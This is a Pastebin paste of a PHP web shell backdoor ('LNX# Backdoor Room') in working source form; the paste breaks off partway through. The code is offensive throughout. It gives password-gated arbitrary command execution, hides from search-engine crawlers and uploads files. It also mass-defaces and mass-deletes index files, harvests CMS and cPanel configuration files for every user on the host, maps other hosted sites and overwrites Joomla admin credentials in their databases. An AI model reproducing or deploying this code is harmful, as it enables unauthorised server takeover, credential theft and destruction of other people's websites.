adiwijaya

LNX# | Backdoor Room

Oct 27th, 2018
204
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 88.43 KB | None | 0 0
  1. <?php
  2. session_start();
  3. error_reporting(0);
  4. set_time_limit(0);
  5. @set_magic_quotes_runtime(0);
  6. @clearstatcache();
  7. @ini_set('error_log',NULL);
  8. @ini_set('log_errors',0);
  9. @ini_set('max_execution_time',0);
  10. @ini_set('output_buffering',0);
  11. @ini_set('display_errors', 0);
  12.  
  13. #################################################
  14. ## ##
  15. ## Name Shell : LNX# Shell Room ##
  16. ## Author : 3Xploit ##
  17. ## Team : LNX#.CREW ##
  18. ## Recoded From : IDX and other shell ##
  19. ## ##
  20. #################################################
  21.  
  22. $auth_pass = "d87273ef4d92eb825269de3289892fb2"; // default: lnx-crew
  23. $color = "#00ff00";
  24. $default_action = 'FilesMan';
  25. $default_use_ajax = true;
  26. $default_charset = 'UTF-8';
  27. if(!empty($_SERVER['HTTP_USER_AGENT'])) {
  28. $userAgents = array("Googlebot", "Slurp", "MSNBot", "PycURL", "facebookexternalhit", "ia_archiver", "crawler", "Yandex", "Rambler", "Yahoo! Slurp", "YahooSeeker", "bingbot");
  29. if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
  30. header('HTTP/1.0 404 eror');
  31. exit;
  32. }
  33. }
  34.  
  35. function login_shell() {
  36. ?>
  37. <html>
  38. <head>
  39. <link rel="shortcut icon" href="https://mbtskoudsalg.com/images/black-door-png-3.png" type="image/png">
  40. <title>LNX# | Backdoor Room</title>
  41. <style type="text/css">
  42. body {
  43. background-color:black;
  44. background-image: url(https://thumbs.gfycat.com/KnobbySoupyHoki-size_restricted.gif);
  45. }
  46. html {
  47. margin: 20px auto;
  48. background: black;
  49. color: #FF0000 ;
  50. text-align: center;
  51. }
  52. header {
  53. color: #53FF00;
  54. margin: 10px auto;
  55. }
  56. input[type=password] {
  57. width: 100px;
  58. height: 20px;
  59. color: green;
  60. background: black;
  61. border: 1px black;
  62. padding: 5px;
  63. margin-left: 20px;
  64. text-align: center;
  65. }
  66. </style>
  67. <h1><div style="text-align: left;"></h1></div>
  68. <br><br><br><br><br><br><br><br><BR>
  69. </head><center><body> <img src="https://image.ibb.co/byLdu9/logo_3.jpg" height="200" width="900"></body></center>
  70. <center>
  71. <br><br>
  72. <font face="courier new" size="4" color="red">[ SECRET ROOM ]</font><br><br><br>
  73. <a href="https://www.google.com/">EXIT</a>
  74. <br><br><br><br><br><br><br><br>
  75. <form method="post">
  76. <input type="password" name="pass">
  77. </form>
  78. <?php
  79. exit;
  80. }
  81. if(!isset($_SESSION[md5($_SERVER['HTTP_HOST'])]))
  82. if( empty($auth_pass) || ( isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass) ) )
  83. $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
  84. else
  85. login_shell();
  86. if(isset($_GET['file']) && ($_GET['file'] != '') && ($_GET['act'] == 'download')) {
  87. @ob_clean();
  88. $file = $_GET['file'];
  89. header('Content-Description: File Transfer');
  90. header('Content-Type: application/octet-stream');
  91. header('Content-Disposition: attachment; filename="'.basename($file).'"');
  92. header('Expires: 0');
  93. header('Cache-Control: must-revalidate');
  94. header('Pragma: public');
  95. header('Content-Length: ' . filesize($file));
  96. readfile($file);
  97. exit;
  98. }
  99. ?>
  100. <html><head>
  101. <link rel="shortcut icon" href="https://static1.squarespace.com/static/5785785bc534a5ef75f91235/594efb49f5e231db42687b3e/594efb6f37c5812dce5bfb6a/1498520049074/Windows+and+Doors+Logo.png" type="image/png">
  102. <title>- SHELL ACTIVATE -</title>
  103. <meta name='author' content='LNX#.CREW'>
  104. <meta charset="UTF-8">
  105. <style type='text/css'>
  106. @import url(https://fonts.googleapis.com/css?family=Ubuntu);
  107. html{
  108. background-color: black;
  109. color: white;
  110. font-family: 'Ubuntu';
  111. font-size: 13px;
  112. width: 100%;
  113. }
  114. li {
  115. display: inline;
  116. margin: 1px;
  117. padding: 1px;
  118. }
  119. #menu a {
  120. padding:2px 10px;
  121. margin:0;
  122. background:black;
  123. text-decoration:none;
  124. letter-spacing:2px;
  125. padding: 2px 10px;
  126. margin: 0;
  127. text-decoration: none;
  128. letter-spacing: 2px;
  129. border-radius: 2px;
  130. border-bottom: 2px solid green;
  131. border-top: 2px solid green;
  132. border-right: 2px solid green;
  133. border-left: 2px solid green;
  134. }
  135. #menu a:hover {
  136. background:black;
  137. border-bottom:0px solid black;
  138. border-top:0px solid black;
  139. }
  140. hr {
  141. color: gray;
  142. }
  143. table tr:first-child{
  144. background: black;
  145. text-align: center;
  146. color: green;
  147. }
  148. table, th, td {
  149. border-collapse:collapse;
  150. font-family: Tahoma, Geneva, sans-serif;
  151. background: transparent;
  152. font-family: 'Share Tech Mono';
  153. font-size: 13px;
  154. }
  155. .table_home, .th_home, .td_home {
  156. border: 1px solid green;
  157. }
  158. th {
  159. padding: 10px;
  160. }
  161. a {
  162. color: white;
  163. text-decoration: none;
  164. }
  165. a:hover {
  166. color: gray;
  167. text-decoration: underline;
  168. }
  169. b {
  170. color: cyan;
  171. }
  172. input[type=text], input[type=password],input[type=submit] {
  173. background: transparent;
  174. color: gray;
  175. border: 1px solid green;
  176. margin: 5px auto;
  177. padding-left: 5px;
  178. font-family: 'Share Tech Mono';
  179. font-size: 13px;
  180. }
  181. input[type=submit] {
  182. background: black;
  183. color: green;
  184. border: 2px green;
  185. margin: 5px auto;
  186. padding-left: 5px;
  187. font-family: 'Share Tech Mono';
  188. font-size: 14px;
  189. cursor:pointer;
  190. }
  191. textarea {
  192. border: 1px solid green;
  193. width: 100%;
  194. height: 400px;
  195. padding-left: 5px;
  196. margin: 10px auto;
  197. resize: none;
  198. background: transparent;
  199. color: gray;
  200. font-family: 'Share Tech Mono';
  201. font-size: 13px;
  202. }
  203. select {
  204. width: 152px;
  205. background: transparent;
  206. color: green;
  207. border: 1px white;
  208. margin: 5px auto;
  209. padding-left: 5px;
  210. font-family: 'Share Tech Mono';
  211. font-size: 13px;
  212. }
  213. option:hover {
  214. background: transparent;
  215. color: #000000;
  216. }
  217. .mybox{
  218. -moz-border-radius: 10px;
  219. border-radius: 10px;
  220. border:1px solid green; padding:4px 2px;
  221. width:70%;
  222. line-height:24px;
  223. background:none;
  224. box-shadow: 0px 4px 2px white;
  225. -webkit-box-shadow: 0px 4px 2px green;
  226. -moz-box-shadow: 0px 4px 2px green;
  227. }
  228. .cgx2 {
  229. text-align: center;
  230. letter-spacing:1px;
  231. font-family: "orbitron";
  232. color: #ff0000;
  233. font-size:25px;text-shadow: 5px 5px 5px black;
  234. }
  235. .infoweb {
  236. border-right: 1px solid #00FFFF;
  237. }
  238. </style>
  239. </head><center><body> <img src="https://image.ibb.co/byLdu9/logo_3.jpg" height="200" width="900"><br><br><h2>LNX# - Shell Backdoor</h2></body></center>
  240. <?php
  241. if (file_exists("php.ini")){
  242. }else{
  243. $img = fopen('php.ini', 'w');
  244. $sec = "safe_mode = OFF
  245. disable_funtions = NONE";
  246. fwrite($img ,$sec);
  247. fclose($img);}
  248. function w($dir,$perm) {
  249. if(!is_writable($dir)) {
  250. return "<font color=red>".$perm."</font>";
  251. } else {
  252. return "<font color=lime>".$perm."</font>";
  253. }
  254. }
  255. function UrlLoop($url,$type){
  256.  
  257. $urlArray = array();
  258.  
  259. $ch = curl_init();
  260. curl_setopt($ch, CURLOPT_URL, $url);
  261. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  262. $result = curl_exec($ch);
  263.  
  264. $regex='|<a.*?href="(.*?)"|';
  265. preg_match_all($regex,$result,$parts);
  266. $links=$parts[1];
  267. foreach($links as $link){
  268. array_push($urlArray, $link);
  269. }
  270. curl_close($ch);
  271.  
  272. foreach($urlArray as $value){
  273. $lol="$url$value";
  274. if(preg_match("#$type#is", $lol)) {
  275. echo "$lol\r\n";
  276. }
  277. }
  278. }
  279. function exe($cmd) {
  280. if(function_exists('system')) {
  281. @ob_start();
  282. @system($cmd);
  283. $buff = @ob_get_contents();
  284. @ob_end_clean();
  285. return $buff;
  286. } elseif(function_exists('exec')) {
  287. @exec($cmd,$results);
  288. $buff = "";
  289. foreach($results as $result) {
  290. $buff .= $result;
  291. } return $buff;
  292. } elseif(function_exists('passthru')) {
  293. @ob_start();
  294. @passthru($cmd);
  295. $buff = @ob_get_contents();
  296. @ob_end_clean();
  297. return $buff;
  298. } elseif(function_exists('shell_exec')) {
  299. $buff = @shell_exec($cmd);
  300. return $buff;
  301. }
  302. }
  303. function perms($file){
  304. $perms = fileperms($file);
  305. if (($perms & 0xC000) == 0xC000) {
  306. // Socket
  307. $info = 's';
  308. } elseif (($perms & 0xA000) == 0xA000) {
  309. // Symbolic Link
  310. $info = 'l';
  311. } elseif (($perms & 0x8000) == 0x8000) {
  312. // Regular
  313. $info = '-';
  314. } elseif (($perms & 0x6000) == 0x6000) {
  315. // Block special
  316. $info = 'b';
  317. } elseif (($perms & 0x4000) == 0x4000) {
  318. // Directory
  319. $info = 'd';
  320. } elseif (($perms & 0x2000) == 0x2000) {
  321. // Character special
  322. $info = 'c';
  323. } elseif (($perms & 0x1000) == 0x1000) {
  324. // FIFO pipe
  325. $info = 'p';
  326. } else {
  327. // Unknown
  328. $info = 'u';
  329. }
  330. // Owner
  331. $info .= (($perms & 0x0100) ? 'r' : '-');
  332. $info .= (($perms & 0x0080) ? 'w' : '-');
  333. $info .= (($perms & 0x0040) ?
  334. (($perms & 0x0800) ? 's' : 'x' ) :
  335. (($perms & 0x0800) ? 'S' : '-'));
  336. // Group
  337. $info .= (($perms & 0x0020) ? 'r' : '-');
  338. $info .= (($perms & 0x0010) ? 'w' : '-');
  339. $info .= (($perms & 0x0008) ?
  340. (($perms & 0x0400) ? 's' : 'x' ) :
  341. (($perms & 0x0400) ? 'S' : '-'));
  342. // World
  343. $info .= (($perms & 0x0004) ? 'r' : '-');
  344. $info .= (($perms & 0x0002) ? 'w' : '-');
  345. $info .= (($perms & 0x0001) ?
  346. (($perms & 0x0200) ? 't' : 'x' ) :
  347. (($perms & 0x0200) ? 'T' : '-'));
  348. return $info;
  349. }
  350. function hdd($s) {
  351. if($s >= 1073741824)
  352. return sprintf('%1.2f',$s / 1073741824 ).' GB';
  353. elseif($s >= 1048576)
  354. return sprintf('%1.2f',$s / 1048576 ) .' MB';
  355. elseif($s >= 1024)
  356. return sprintf('%1.2f',$s / 1024 ) .' KB';
  357. else
  358. return $s .' B';
  359. }
  360. function ambilKata($param, $kata1, $kata2){
  361. if(strpos($param, $kata1) === FALSE) return FALSE;
  362. if(strpos($param, $kata2) === FALSE) return FALSE;
  363. $start = strpos($param, $kata1) + strlen($kata1);
  364. $end = strpos($param, $kata2, $start);
  365. $return = substr($param, $start, $end - $start);
  366. return $return;
  367. }
  368. function getsource($url) {
  369. $curl = curl_init($url);
  370. curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
  371. curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true);
  372. curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
  373. curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false);
  374. $content = curl_exec($curl);
  375. curl_close($curl);
  376. return $content;
  377. }
  378. if(get_magic_quotes_gpc()) {
  379. function idx_ss($array) {
  380. return is_array($array) ? array_map('idx_ss', $array) : stripslashes($array);
  381. }
  382. $_POST = idx_ss($_POST);
  383. }
  384. function CreateTools($names,$lokasi){
  385. if ( $_GET['create'] == $names ){
  386. $a= "".$_SERVER['SERVER_NAME']."";
  387. $b= dirname($_SERVER['PHP_SELF']);
  388. $c = "/coro.id/".$names.".php";
  389. if (file_exists('coro.id/'.$names.'.php')){
  390. echo '<script type="text/javascript">alert("Done");window.location.href = "coro.id/'.$names.'.php";</script> ';
  391. }
  392. else {mkdir("coro.id", 0777);
  393. file_put_contents('coro.id/'.$names.'.php', file_get_contents($lokasi));
  394. echo ' <script type="text/javascript">alert("Done");window.location.href = "coro.id/'.$names.'.php";</script> ';}}}
  395. if(isset($_GET['dir'])) {
  396. $dir = $_GET['dir'];
  397. chdir($_GET['dir']);
  398. } else {
  399. $dir = getcwd();
  400. }
  401. $dir = str_replace("\\","/",$dir);
  402. $scdir = explode("/", $dir);
  403. $sm = (@ini_get(strtolower("safe_mode")) == 'on') ? "<font color=red>ON</font>" : "<font color=lime>OFF</font>";
  404. $ling="http://".$_SERVER['SERVER_NAME']."" .$_SERVER['PHP_SELF']."?create";
  405. $ds = @ini_get("disable_functions");
  406. $mysql = (function_exists('mysql_connect')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
  407. $curl = (function_exists('curl_version')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
  408. $wget = (exe('wget --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
  409. $perl = (exe('perl --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
  410. $python = (exe('python --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
  411. $show_ds = (!empty($ds)) ? "<font color=red>$ds</font>" : "<font color=lime>NONE</font>";
  412. if(!function_exists('posix_getegid')) {
  413. $user = @get_current_user();
  414. $uid = @getmyuid();
  415. $gid = @getmygid();
  416. $group = "?";
  417. } else {
  418. $uid = @posix_getpwuid(posix_geteuid());
  419. $gid = @posix_getgrgid(posix_getegid());
  420. $user = $uid['name'];
  421. $uid = $uid['uid'];
  422. $group = $gid['name'];
  423. $gid = $gid['gid'];
  424. }
  425. $d0mains = @file("/etc/named.conf");
  426. $users=@file('/etc/passwd');
  427. if($d0mains)
  428. {
  429. $count;
  430. foreach($d0mains as $d0main)
  431. {
  432. if(@ereg("zone",$d0main))
  433. {
  434. preg_match_all('#zone "(.*)"#', $d0main, $domains);
  435. flush();
  436. if(strlen(trim($domains[1][0])) > 2)
  437. {
  438. flush();
  439. $count++;
  440. }
  441. }
  442. }
  443. }
  444.  
  445.  
  446.  
  447. echo "<tr><td>MySQL: $mysql | Perl: $perl | Python: $python | WGET: $wget | CURL: $curl </td></tr>";
  448. echo "<br><tr><td>Current DIR: ";
  449. foreach($scdir as $c_dir => $cdir) {
  450. echo "<a href='?dir=";
  451. for($i = 0; $i <= $c_dir; $i++) {
  452. echo $scdir[$i];
  453. if($i != $c_dir) {
  454. echo "/";
  455. }
  456. }
  457. echo "'>$cdir</a>/";
  458. }
  459. echo "<tr><td><form method='post' action='?dir=$dir&do=cmd'>
  460. Command :
  461. <input type='text' size='30' height='10' name='cmd'><input type='submit' name='do_cmd' value='>>'>
  462. </form></td></tr>";
  463. echo "</table><hr>";
  464. echo "<center>";
  465. echo "<ul>";
  466. echo "<li>[ <a style='color: yellow;' href='?'>Home</a> ]</li>";
  467. echo "<li>[ <a href='?dir=$dir&do=upload'>Upload</a> ]</li>";
  468. echo "<li>[ <a style='color: red;' href='?logout=true'>Logout</a> ]</li>";
  469. echo "<br><br><a style='color: #4BFF00;' href='?dir=$dir&do=infosys'>Info Server</a> </li>";
  470. echo "<br><br><li>[ <a style='color: silver;' href='?dir=$dir&do=cmd'>Command</a> ]</li>";
  471. echo "<li>[ <a style='color: silver;' href='?dir=$dir&do=mass_deface'>Mass Deface</a> ]</li>";
  472. echo "<li>[ <a style='color: silver;' href='?dir=$dir&do=mass_delete'>Mass Delete</a> ]</li>";
  473. echo "<li>[ <a style='color: silver;' href='?dir=$dir&do=config'>Config</a> ]</li>";
  474. echo "<li>[ <a style='color: silver;' href='?dir=$dir&do=jumping'>Jumping</a> ]</li>";
  475. echo "<br><br><li>[ <a href='?dir=$dir&do=cpanel'>CPanel Crack</a> ]</li>";
  476. echo "<li>[ <a style='color: silver;' href='?dir=$dir&do=smtp'>SMTP Grabber</a> ]</li>";
  477. echo "<li>[ <a style='color: silver;' href='?dir=$dir&do=zoneh'>Zone-H</a> ]</li>";
  478. echo "<li>[ <a style='color: silver;' href='?dir=$dir&do=cgi'>CGI Telnet</a> ]</li>";
  479. echo "<li>[ <a style='color: silver;' href='?dir=$dir&do=network'>network</a> ]</li>";
  480. echo "<li>[ <a style='color: silver;' href='?dir=$dir&do=adminer'>Adminer</a> ]</li>";
  481. echo "<br><br><li>[ <a style='color: silver;' href='?dir=$dir&do=fake_root'>Fake Root</a> ]</li>";
  482. echo "<li>[ <a style='color: silver;' href='?dir=$dir&do=auto_edit_user'>Edit User</a> ]</li>";
  483. echo "<li>[ <a style='color: silver;' href='?dir=$dir&do=auto_wp'>Edit Title WordPress</a> ]</li>";
  484. echo "<li>[ <a style='color: silver;' href='?dir=$dir&do=auto_dwp'>WordPress Auto Deface</a> ]</li>";
  485. echo "<li>[ <a style='color: silver;' href='?dir=$dir&do=auto_dwp2'>WP Deface V.2</a> ]</li>";
  486. echo "<li>[ <a style='color: silver;' href='?dir=$dir&do=cpftp_auto'>CFTP Deface</a> ]</li>";
  487. echo "</ul>";
  488. echo "</center>";
  489. echo "<hr>";
  490.  
  491. if($_GET['logout'] == true) {
  492. unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
  493. echo "<script>window.location='?';</script>";
  494. }
  495. elseif($_GET['do'] == 'upload') {
  496. echo "<center>";
  497. if($_POST['upload']) {
  498. if($_POST['tipe_upload'] == 'biasa') {
  499. if(@copy($_FILES['ix_file']['tmp_name'], "$dir/".$_FILES['ix_file']['name']."")) {
  500. $act = "<font color=lime>Uploaded!</font> at <i><b>$dir/".$_FILES['ix_file']['name']."</b></i>";
  501. } else {
  502. $act = "<font color=red>failed to upload file</font>";
  503. }
  504. } else {
  505. $root = $_SERVER['DOCUMENT_ROOT']."/".$_FILES['ix_file']['name'];
  506. $web = $_SERVER['HTTP_HOST']."/".$_FILES['ix_file']['name'];
  507. if(is_writable($_SERVER['DOCUMENT_ROOT'])) {
  508. if(@copy($_FILES['ix_file']['tmp_name'], $root)) {
  509. $act = "<font color=lime>Uploaded!</font> at <i><b>$root -> </b></i><a href='http://$web' target='_blank'>$web</a>";
  510. } else {
  511. $act = "<font color=red>failed to upload file</font>";
  512. }
  513. } else {
  514. $act = "<font color=red>failed to upload file</font>";
  515. }
  516. }
  517. }
  518. echo "Upload File:
  519. <form method='post' enctype='multipart/form-data'>
  520. <input type='radio' name='tipe_upload' value='biasa' checked>Biasa [ ".w($dir,"Writeable")." ]
  521. <input type='radio' name='tipe_upload' value='home_root'>home_root [ ".w($_SERVER['DOCUMENT_ROOT'],"Writeable")." ]<br>
  522. <input type='file' name='ix_file'>
  523. <input type='submit' value='upload' name='upload'>
  524. </form>";
  525. echo $act;
  526. echo "</center>";
  527. }
  528. elseif($_GET['do'] == 'cmd') {
  529. echo "<form method='post'>
  530. <font style='text-decoration: underline;'>".$user."@".gethostbyname($_SERVER['HTTP_HOST']).":~# </font>
  531. <input type='text' size='30' height='10' name='cmd'><input type='submit' name='do_cmd' value='>>'>
  532. </form>";
  533. if($_POST['do_cmd']) {
  534. echo "<pre>".exe($_POST['cmd'])."</pre>";
  535. }
  536. } elseif($_GET['do'] == 'mass_deface') {
  537. function deface_masall($dir,$namafile,$isi_script) {
  538. if(is_writable($dir)) {
  539. $dira = scandir($dir);
  540. foreach($dira as $dirb) {
  541. $dirc = "$dir/$dirb";
  542. $lokasi = $dirc.'/'.$namafile;
  543. if($dirb === '.') {
  544. file_put_contents($lokasi, $isi_script);
  545. } elseif($dirb === '..') {
  546. file_put_contents($lokasi, $isi_script);
  547. } else {
  548. if(is_dir($dirc)) {
  549. if(is_writable($dirc)) {
  550. echo "[<font color=lime>DONE</font>] $lokasi<br>";
  551. file_put_contents($lokasi, $isi_script);
  552. $idx = deface_massal($dirc,$namafile,$isi_script);
  553. }
  554. }
  555. }
  556. }
  557. }
  558. }
  559. function deface ($dir,$namafile,$isi_script) {
  560. if(is_writable($dir)) {
  561. $dira = scandir($dir);
  562. foreach($dira as $dirb) {
  563. $dirc = "$dir/$dirb";
  564. $lokasi = $dirc.'/'.$namafile;
  565. if($dirb === '.') {
  566. file_put_contents($lokasi, $isi_script);
  567. } elseif($dirb === '..') {
  568. file_put_contents($lokasi, $isi_script);
  569. } else {
  570. if(is_dir($dirc)) {
  571. if(is_writable($dirc)) {
  572. echo "[<font color=lime>DONE</font>] $lokasi<br>";
  573. file_put_contents($lokasi, $isi_script);
  574. }
  575. }
  576. }
  577. }
  578. }
  579. }
  580. if($_POST['start']) {
  581. if($_POST['tipe_deface'] == 'mahal') {
  582. echo "<div style='margin: 5px auto; padding: 5px'>";
  583. deface_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
  584. echo "</div>";
  585. } elseif($_POST['tipe_deface'] == 'murah') {
  586. echo "<div style='margin: 5px auto; padding: 5px'>";
  587. deface($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
  588. echo "</div>";
  589. }
  590. } else {
  591. echo "<center>";
  592. echo "<form method='post'>
  593. <font style='text-decoration: underline;'>Tipe Sabun:</font><br>
  594. <input type='radio' name='tipe_deface' value='murah' checked>Biasa<input type='radio' name='tipe_deface' value='mahal'>Massal<br>
  595. <font style='text-decoration: underline;'>Folder:</font><br>
  596. <input type='text' name='d_dir' value='$dir' style='width: 450px;' height='10'><br>
  597. <font style='text-decoration: underline;'>Filename:</font><br>
  598. <input type='text' name='d_file' value='index.php' style='width: 450px;' height='10'><br>
  599. <font style='text-decoration: underline;'>Index File:</font><br>
  600. <textarea name='script' style='width: 450px; height: 200px;'>LMX# Crew</textarea><br>
  601. <input type='submit' name='start' value='Mass Deface' style='width: 450px;'>
  602. </form></center>";
  603. }
  604. } elseif($_GET['do'] == 'mass_delete') {
  605. function hapus_massal($dir,$namafile) {
  606. if(is_writable($dir)) {
  607. $dira = scandir($dir);
  608. foreach($dira as $dirb) {
  609. $dirc = "$dir/$dirb";
  610. $lokasi = $dirc.'/'.$namafile;
  611. if($dirb === '.') {
  612. if(file_exists("$dir/$namafile")) {
  613. unlink("$dir/$namafile");
  614. }
  615. } elseif($dirb === '..') {
  616. if(file_exists("".dirname($dir)."/$namafile")) {
  617. unlink("".dirname($dir)."/$namafile");
  618. }
  619. } else {
  620. if(is_dir($dirc)) {
  621. if(is_writable($dirc)) {
  622. if(file_exists($lokasi)) {
  623. echo "[<font color=lime>DELETED</font>] $lokasi<br>";
  624. unlink($lokasi);
  625. $LNX = hapus_massal($dirc,$namafile);
  626. }
  627. }
  628. }
  629. }
  630. }
  631. }
  632. }
  633. if($_POST['start']) {
  634. echo "<div style='margin: 5px auto; padding: 5px'>";
  635. hapus_massal($_POST['d_dir'], $_POST['d_file']);
  636. echo "</div>";
  637. } else {
  638. echo "<center>";
  639. echo "<form method='post'>
  640. <font style='text-decoration: underline;'>Folder:</font><br>
  641. <input type='text' name='d_dir' value='$dir' style='width: 450px;' height='10'><br>
  642. <font style='text-decoration: underline;'>Filename:</font><br>
  643. <input type='text' name='d_file' value='index.php' style='width: 450px;' height='10'><br>
  644. <input type='submit' name='start' value='Mass Delete' style='width: 450px;'>
  645. </form></center>";
  646. }
  647. } elseif($_GET['do'] == 'config') {
  648. $etc = fopen("/etc/passwd", "r");
  649. $LNX = mkdir("config", 0777);
  650. $isi_htc = "Options all\nRequire None\nSatisfy Any";
  651. $htc = fopen("config/.htaccess","w");
  652. fwrite($htc, $isi_htc);
  653. while($passwd = fgets($etc)) {
  654. if($passwd == "" || !$etc) {
  655. echo "<font color=red>Can't read /etc/passwd</font>";
  656. } else {
  657. preg_match_all('/(.*?):x:/', $passwd, $user_config);
  658. foreach($user_config[1] as $user_LNX) {
  659. $user_config_dir = "/home/$user_LNX/public_html/";
  660. if(is_readable($user_config_dir)) {
  661. $grab_config = array(
  662. "/home/$user_lnx/.my.cnf" => "cpanel",
  663. "/home/$user_lnx/.accesshash" => "WHM-accesshash",
  664. "/home/$user_lnx/public_html/vdo_config.php" => "Voodoo",
  665. "/home/$user_lnx/public_html/bw-configs/config.ini" => "BosWeb",
  666. "/home/$user_lnx/public_html/config/koneksi.php" => "Lokomedia",
  667. "/home/$user_lnx/public_html/lokomedia/config/koneksi.php" => "Lokomedia",
  668. "/home/$user_lnx/public_html/clientarea/configuration.php" => "WHMCS",
  669. "/home/$user_lnx/public_html/whm/configuration.php" => "WHMCS",
  670. "/home/$user_lnx/public_html/whmcs/configuration.php" => "WHMCS",
  671. "/home/$user_lnx/public_html/forum/config.php" => "phpBB",
  672. "/home/$user_lnx/public_html/sites/default/settings.php" => "Drupal",
  673. "/home/$user_lnx/public_html/config/settings.inc.php" => "PrestaShop",
  674. "/home/$user_lnx/public_html/app/etc/local.xml" => "Magento",
  675. "/home/$user_lnx/public_html/joomla/configuration.php" => "Joomla",
  676. "/home/$user_lnx/public_html/configuration.php" => "Joomla",
  677. "/home/$user_lnx/public_html/wp/wp-config.php" => "WordPress",
  678. "/home/$user_lnx/public_html/wordpress/wp-config.php" => "WordPress",
  679. "/home/$user_lnx/public_html/wp-config.php" => "WordPress",
  680. "/home/$user_lnx/public_html/admin/config.php" => "OpenCart",
  681. "/home/$user_lnx/public_html/slconfig.php" => "Sitelok",
  682. "/home/$user_lnx/public_html/application/config/database.php" => "Ellislab");
  683. foreach($grab_config as $config => $nama_config) {
  684. $ambil_config = file_get_contents($config);
  685. if($ambil_config == '') {
  686. } else {
  687. $file_config = fopen("config/$user_LNX-$nama_config.txt","w");
  688. fputs($file_config,$ambil_config);
  689. }
  690. }
  691. }
  692. }
  693. }
  694. }
  695. echo "<center><a href='?dir=$dir/config'><font color=lime>Done</font></a></center>";
  696.  
  697. }elseif($_GET['do'] == 'infosys') {
  698.  
  699. echo '<center><div id="menu" >';
  700. echo "<ul>";
  701. echo "System: <font color=blue>".$kernel."</font><br>";
  702. echo "User: <font color=blue>".$user."</font> (".$uid.") Group: <font color=blue>".$group."</font> (".$gid.")<br>";
  703. echo "Server IP: <font color=blue>".$ip."</font> | Your IP: <font color=blue>".$_SERVER['REMOTE_ADDR']."</font><br>";
  704. echo "HDD: <font color=blue>$used</font> / <font color=blue>$total</font> ( Free: <font color=blue>$freespace</font> )<br>";
  705. echo "Safe Mode: $sm<br>";
  706. echo "Disable Functions: $show_ds<br>";
  707. echo "User: ".$user." (".$uid.") Group: ".$group." (".$gid.")<br>";
  708. echo "MySQL: $mysql | Perl: $perl | Python: $python | WGET: $wget | CURL: $curl <br>";
  709. echo "<hr>";
  710.  
  711.  
  712. } elseif($_GET['do'] == 'jumping') {
  713. $i = 0;
  714. echo "<pre><div class='margin: 5px auto;'>";
  715. $etc = fopen("/etc/passwd", "r");
  716. while($passwd = fgets($etc)) {
  717. if($passwd == '' || !$etc) {
  718. echo "<font color=red>Can't read /etc/passwd</font>";
  719. } else {
  720. preg_match_all('/(.*?):x:/', $passwd, $user_jumping);
  721. foreach($user_jumping[1] as $user_lnx_jump) {
  722. $user_jumping_dir = "/home/$user_LNX_jump/public_html";
  723. if(is_readable($user_jumping_dir)) {
  724. $i++;
  725. $jrw = "[<font color=lime>R</font>] <a href='?dir=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
  726. if(is_writable($user_jumping_dir)) {
  727. $jrw = "[<font color=lime>RW</font>] <a href='?dir=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
  728. }
  729. echo $jrw;
  730. if(function_exists('posix_getpwuid')) {
  731. $domain_jump = file_get_contents("/etc/named.conf");
  732. if($domain_jump == '') {
  733. echo " => ( <font color=red>gabisa ambil nama domain nya</font> )<br>";
  734. } else {
  735. preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump);
  736. foreach($domains_jump[1] as $dj) {
  737. $user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
  738. $user_jumping_url = $user_jumping_url['name'];
  739. if($user_jumping_url == $user_LNX_jump) {
  740. echo " => ( <u>$dj</u> )<br>";
  741. break;
  742. }
  743. }
  744. }
  745. } else {
  746. echo "<br>";
  747. }
  748. }
  749. }
  750. }
  751. }
  752. if($i == 0) {
  753. } else {
  754. echo "<br>Total ada ".$i." Kamar di ".gethostbyname($_SERVER['HTTP_HOST'])."";
  755. }
  756. echo "</div></pre>";
  757. } elseif($_GET['do'] == 'auto_edit_user') {
  758. if($_POST['hajar']) {
  759. if(strlen($_POST['pass_baru']) < 6 OR strlen($_POST['user_baru']) < 6) {
  760. echo "username atau password harus lebih dari 6 karakter";
  761. } else {
  762. $user_baru = $_POST['user_baru'];
  763. $pass_baru = md5($_POST['pass_baru']);
  764. $conf = $_POST['config_dir'];
  765. $scan_conf = scandir($conf);
  766. foreach($scan_conf as $file_conf) {
  767. if(!is_file("$conf/$file_conf")) continue;
  768. $config = file_get_contents("$conf/$file_conf");
  769. if(preg_match("/JConfig|joomla/",$config)) {
  770. $dbhost = ambilkata($config,"host = '","'");
  771. $dbuser = ambilkata($config,"user = '","'");
  772. $dbpass = ambilkata($config,"password = '","'");
  773. $dbname = ambilkata($config,"db = '","'");
  774. $dbprefix = ambilkata($config,"dbprefix = '","'");
  775. $prefix = $dbprefix."users";
  776. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  777. $db = mysql_select_db($dbname);
  778. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  779. $result = mysql_fetch_array($q);
  780. $id = $result['id'];
  781. $site = ambilkata($config,"sitename = '","'");
  782. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE id='$id'");
  783. echo "Config => ".$file_conf."<br>";
  784. echo "CMS => Joomla<br>";
  785. if($site == '') {
  786. echo "Sitename => <font color=red>error, gabisa ambil nama domain </font><br>";
  787. } else {
  788. echo "Sitename => $site<br>";
  789. }
  790. if(!$update OR !$conn OR !$db) {
  791. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  792. } else {
